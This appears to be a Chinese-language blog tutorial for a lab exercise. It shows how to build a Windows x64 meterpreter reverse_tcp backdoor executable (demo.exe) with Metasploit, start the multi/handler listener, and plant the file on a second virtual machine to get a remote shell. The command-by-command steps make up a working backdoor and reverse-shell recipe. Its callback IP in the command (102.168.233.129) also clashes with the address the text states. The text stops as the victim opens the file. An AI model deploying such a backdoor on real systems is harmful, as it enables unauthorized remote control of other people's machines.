首先我们需要了解的是msf工具的使用步骤,在我主页一个名为msf攻击永恒之蓝的文章中提到过,此处再进行提示。
- 搜索漏洞的模块
- 使用模块
- 配置模块必选项
- 运行模块
攻击前步骤
此处kali的IP地址视kali执行命令行ifconfig得出的ip地址而定。
ifconfig
标黄部分即为我的kali的IP地址,为192.168.233.129。
加入到语句中,执行该语句,发现桌面出现了一个名为demo.exe的文件。该文件就是后门。
-p windows/x64/meterpreter/reverse_tcp lhost=102.168.233.129 lport=6666 -f exe -o demo.exe
使用模块
键入命令
msfconsole
进入到msf软件中。
该模块是msf中常用的模块,需要记住。
use exploit/multi/handler
exploit 攻击 multi 多的 handler 负载程序
配置模块必选项
查看设置
show options
要把当前使用的攻击载荷改成上述中的windows/x64/meterpreter/reverse_tcp,设置payload,即
再查看之前创建后门文件的语句,即可知道我的IP地址为192.168.233.129 端口号也就是lport为6666,注意ip地址为之前ifconfig后知道的本机kali地址,lport为之前创建文件所设定的端口号。
运行模块
run
将之前所制作的后门文件移植到另一个虚拟机(注意,此虚拟机要是64位系统)中,在该虚拟机中点击后门文件,则会出现